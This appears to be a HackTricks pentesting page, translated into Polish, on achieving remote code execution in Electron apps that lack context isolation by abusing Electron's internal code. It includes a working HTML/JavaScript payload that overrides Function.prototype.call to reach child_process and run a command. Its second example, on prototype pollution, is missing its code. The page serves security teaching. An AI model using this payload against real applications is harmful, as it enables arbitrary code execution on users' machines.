Electron contextIsolation RCE via Electron internal code

Reading time: 2 minutes

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Example 1

Przykład z https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

Listener zdarzenia "exit" jest zawsze ustawiany przez kod wewnętrzny, gdy rozpoczyna się ładowanie strony. To zdarzenie jest emitowane tuż przed nawigacją:

javascript
process.on("exit", function () {
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

{{#ref}} https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36 {{#endref}}

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Już nie istnieje

Następnie przechodzi tutaj:

Gdzie "self" to obiekt procesu Node:

Obiekt procesu ma odniesienie do funkcji "require":

process.mainModule.require

Ponieważ handler.call ma otrzymać obiekt procesu, możemy go nadpisać, aby wykonać dowolny kod:

html
<script>
Function.prototype.call = function (process) {
process.mainModule.require("child_process").execSync("calc")
}
location.reload() //Trigger the "exit" event
</script>

Przykład 2

Uzyskaj obiekt require z zanieczyszczenia prototypu. Z https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Wyciekanie:

Eksploatacja:

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks